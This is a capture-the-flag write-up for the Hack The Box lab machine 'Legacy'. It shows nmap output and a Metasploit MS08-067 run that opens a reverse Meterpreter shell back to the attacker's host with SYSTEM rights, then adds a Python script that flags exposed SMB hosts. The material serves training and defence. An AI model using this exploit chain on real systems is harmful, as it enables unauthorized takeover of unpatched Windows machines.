
Legacy writeup

Summary

This was a very easy box that only required some basic Google skills as well as some knowledge of Metasploit. Let's take a look.

Foothold & Privesc

Let’s start out by doing an nmap port scan.

┌──(bitis㉿workstation)-[~/htb/Machines/Legacy]
└─$ nmap -sC -sV 10.129.227.181
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-23 00:39 CEST
Nmap scan report for 10.129.227.181
Host is up (0.099s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 4d22h27m49s, deviation: 2h07m16s, median: 4d20h57m49s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:96:d1:40 (VMware)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2022-06-28T01:37:03+03:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.75 seconds

The nmap scan reveals that the machine is running Windows XP as its OS. Ports 139 and 445 are also open, which are used for SMB. I initially thought the machine would be vulnerable to EternalBlue, and indeed it is, but the Metasploit module for EternalBlue that I found only had payloads for the x64 architecture, which the target machine was not using. Searching for related vulnerabilities points us towards the Metasploit module described here. Let's try to use it.

msf6 exploit(windows/smb/ms08_067_netapi) > run

[*] Started reverse TCP handler on 10.10.17.182:4444 
[*] 10.129.227.181:445 - Automatically detecting the target...
[*] 10.129.227.181:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.129.227.181:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.129.227.181:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175686 bytes) to 10.129.227.181
[*] Meterpreter session 1 opened (10.10.17.182:4444 -> 10.129.227.181:1032) at 2022-06-23 01:03:26 +0200

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

Rooted!
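As an added defender-side example (not part of the original writeup), the Python below reads the kind of nmap output shown above and flags the exposure pattern this box exhibits: SMB reachable, an end-of-life OS reported by smb-os-discovery, message signing disabled, and a guest session accepted. The sample scan text is a constructed, trimmed copy of the scan above, and the EOL_OS list is an assumption.

```python
import re

# Constructed sample: a trimmed copy of the scan output above (not a live capture).
SAMPLE_SCAN = """\
Nmap scan report for 10.129.227.181
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds
| smb-security-mode:
|   account_used: guest
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
"""

# Assumed list of end-of-life OS prefixes to flag; extend as needed.
EOL_OS = ("Windows XP", "Windows 2000", "Windows Server 2003")

def parse_nmap(text):
    """Parse nmap normal output into {host: {ports, os, signing, guest}}."""
    hosts, cur = {}, None
    for line in text.splitlines():
        if m := re.match(r"Nmap scan report for (\S+)", line):
            cur = hosts.setdefault(m[1], {"ports": set(), "os": None, "signing": None, "guest": False})
        elif cur is None:
            continue                                    # skip the Nmap banner lines
        elif m := re.match(r"(\d+)/tcp\s+open\b", line):
            cur["ports"].add(int(m[1]))                 # open TCP port
        elif m := re.match(r"\|_?\s+OS:\s+(.+)", line):
            cur["os"] = m[1].strip()                    # from smb-os-discovery
        elif m := re.match(r"\|_?\s+message_signing:\s+(\w+)", line):
            cur["signing"] = m[1]                       # from smb-security-mode
        elif re.match(r"\|_?\s+account_used:\s+guest", line):
            cur["guest"] = True                         # scan authenticated as guest
    return hosts

def triage(hosts):
    """Map host -> findings for hosts showing the SMB exposure pattern above."""
    report = {}
    for host, info in hosts.items():
        if not info["ports"] & {139, 445}:
            continue                                    # no SMB: not this pattern
        findings = ["SMB exposed"]
        if info["os"] and info["os"].startswith(EOL_OS):
            findings.append("end-of-life OS: " + info["os"])
        if info["signing"] == "disabled":
            findings.append("SMB signing disabled")
        if info["guest"]:
            findings.append("guest session accepted")
        report[host] = findings
    return report
```

Feed it the saved output of `nmap -sC -sV -oN scan.txt <range>` to get a per-host list of the same red flags the writeup acts on.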

This post is licensed under CC BY 4.0 by the author.